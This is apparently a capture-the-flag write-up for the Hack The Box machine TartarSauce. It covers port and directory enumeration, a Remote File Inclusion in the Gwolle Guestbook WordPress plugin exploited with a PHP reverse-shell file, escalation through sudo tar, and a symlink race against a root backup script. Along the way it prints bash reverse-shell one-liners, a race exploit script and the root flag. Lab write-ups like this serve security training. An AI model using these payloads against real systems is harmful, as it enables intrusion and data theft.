TartarSauce

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.88 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.-p-
scanning the entire port range, from 1 to 65535.-T5
insane mode, it is the fastest mode of the nmap time template.-Pn
assume the host is online.-n
scan without reverse DNS resolution.-oN
save the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Thu Jun 30 12:06:58 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.88
Nmap scan report for 10.10.10.88
Host is up (0.074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
# Nmap done at Thu Jun 30 12:07:12 2022 -- 1 IP address (1 host up) scanned in 14.08 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80 10.10.10.88 -oN targeted
-sC
performs the scan using the default set of scripts.-sV
enables version detection.-oN
save the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Jun 30 12:07:25 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.88
Nmap scan report for 10.10.10.88
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 30 12:07:35 2022 -- 1 IP address (1 host up) scanned in 10.17 seconds
Let's take a look at the website.

Not much going on. As we can see in the nmap scan, there is a robots.txt
file, let's take a look at it.

We see a bunch of subdirectories of the /webservices
directory. Let's try to fuzz directories with gobuster.
gobuster dir -u http://10.10.10.88/webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
dir
enumerates directories or files.-u
the target URL.-w
path to the wordlist.-t
number of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88/webservices
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/01 00:23:40 Starting gobuster in directory enumeration mode
===============================================================
/wp (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]
===============================================================
2022/07/01 00:24:34 Finished
===============================================================
Let's take a look at the /webservices/wp
directory.

As we can see, it looks pretty awful. If we take a look at the source code, we'll see that the website is tying to load resources from tartarsauce.htb
. Let's add the domain name to the /etc/hosts
file.

nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.88 tartarsauce.htb
Now it should look a bit better.

As the website has the WordPress CMS, I tried to enumerate WordPress plugins with gobuster.
gobuster dir -u http://10.10.10.88/webservices/wp -w /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt -t 200
dir
enumerates directories or files.-u
the target URL.-w
path to the wordlist.-t
number of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.88/webservices/wp
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/01 00:54:13 Starting gobuster in directory enumeration mode
===============================================================
/wp-content/plugins/akismet/ (Status: 200) [Size: 0]
/wp-content/plugins/gwolle-gb/ (Status: 200) [Size: 0]
/wp-content/plugins/hello.php (Status: 500) [Size: 0]
/wp-content/plugins/hello.php/ (Status: 500) [Size: 0]
===============================================================
2022/07/01 00:54:21 Finished
===============================================================
There is the gwolle-gb
plugin. Let's search for common vulnerabilities associated with that plugin.
searchsploit gwolle
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | php/webapps/38861.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploitation
As we can see, there is one Remote File Inclusion vulnerability that we can exploit.
If we take a look at the exploit, we'll see that if we set the abspath
parameter to our HTTP server, it will try to load a file called wp-load.php
. So if we create a malicious file with that name, and then make it send us a reverse shell, when we indicate our HTTP server, the file will be executed, and we'll be able to get a reverse shell.
nano wp-load.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Now, let's set a simple HTTP server with python on port 80.
python -m http.server 80
Then, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
Finally, if we make a request to the following URL, the wp-load.php
file should be executed, and we should get the reverse shell as the www-data
user.
curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.8/'
❯ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.88] 43662
bash: cannot set terminal process group (1357): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami
whoami
www-data
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z
and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we list the sudo privileges of the www-data
user, we'll see that we can execute tar as the onuma
user.
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
In the site GTFOBins, we can see a way of getting a shell as the onuma
user.
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
<null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
whoami
onuma
To get a more interactive shell, let's set another netcat listener on port 4444.
nc -lvnp 4444
And send another reverse shell as the onuma
user.
bash -i >& /dev/tcp/10.10.14.8/4444 0>&1
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.88] 43664
bash: cannot set terminal process group (1357): Inappropriate ioctl for device
bash: no job control in this shell
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ whoami
whoami
onuma
Now, let's set an interactive TTY shell with the same way as before. Once we have an interactive TTY, we could see if there is any scheduled task with the pspy tool. Let's transfer the 32 bytes version to the machine, on the /tmp
directory.
cd /tmp
nc -lvnp 5555 > pspy32
On our local machine.
nc 10.10.10.88 5555 < pspy32
Then, give the binary execution permissions.
chmod +x pspy32
And finally execute it.
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
***
2022/06/30 19:37:15 CMD: UID=0 PID=25632 | /bin/bash /usr/sbin/backuperer
***
We can see that root is executing the /usr/sbin/backuperer
file. Let's take a look at it.
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
Basically, the bash script is compressing the /var/www/html
directory, then it stores the compressed file in the /var/tmp
directory. Then, it waits for 30 seconds, and then it decompresses the file in the /var/tmp/check
directory. And finally, it compares the original /var/www/html
with the one it just has been decompressed, if there are any differences, it will put them in the /var/backups/onuma_backup_error.txt
file. The idea here is to compress the /var/www/html
directory into the compressed.tar
file.
tar -zcvf compressed.tar /var/www/html/
-z
filter the archive through gzip.-c
create new archive.-v
verbose mode.-f
specific file.
Then, send the file to our local machine.
nc -lvnp 5555 > compressed.tar
On the victim machine.
nc 10.10.10.88 5555 < compressed.tar
Then decompress the file on the local machine.
tar -zxvf compressed.tar /var/www/html/
-z
filter the archive through gzip.-x
extract the archive.-v
verbose mode.-f
specific file.
And then, make a symbolic link from the var/www/html/index.html
to /root/root.txt
, so we can see the root flag.
ln -s -f /root/root.txt var/www/html/index.html
-s
make a symbolic link.-f
force.
And then compress again the var/www/html
directory to the compressed-mod.tar
file.
tar -zcvf compressed-mod.tar var/www/html/
And transfer it to the victim machine.
nc -lvnp 5555 > compressed-mod.tar
On our local machine.
nc 10.10.10.88 5555 < compressed-mod.tar
Finally, I made this bash script which will detect when the temporary compressed file is made, and then it replaces it with the one we just made.
#!/bin/bash
function ctrl_c(){
echo -e "\nQuiting ..."
exit 1
}
# Ctrl+C
trap ctrl_c INT
while true; do
filename="$(ls -la /var/tmp/ | grep -oP '\.\w{40}')"
if [ "$filename" ]; then
echo -e "\nFile $filename detected"
rm -f /var/tmp/$filename
cp /tmp/compressed-mod.tar /var/tmp/$filename
echo -e "\nDone!"
exit 0
fi
done
Now, let's execute it.
chmod +x exploit.sh
./exploit.sh
File .23d8e3660af1e9173d055e4847724cb7e2ac3f51 detected
Done!
Now, all we have to do is read the /var/backups/onuma_backup_error.txt
file, and reap the harvest and take the root flag.
> d349f8d21a1a6d0c6df352551adf2bc1
Last updated
Was this helpful?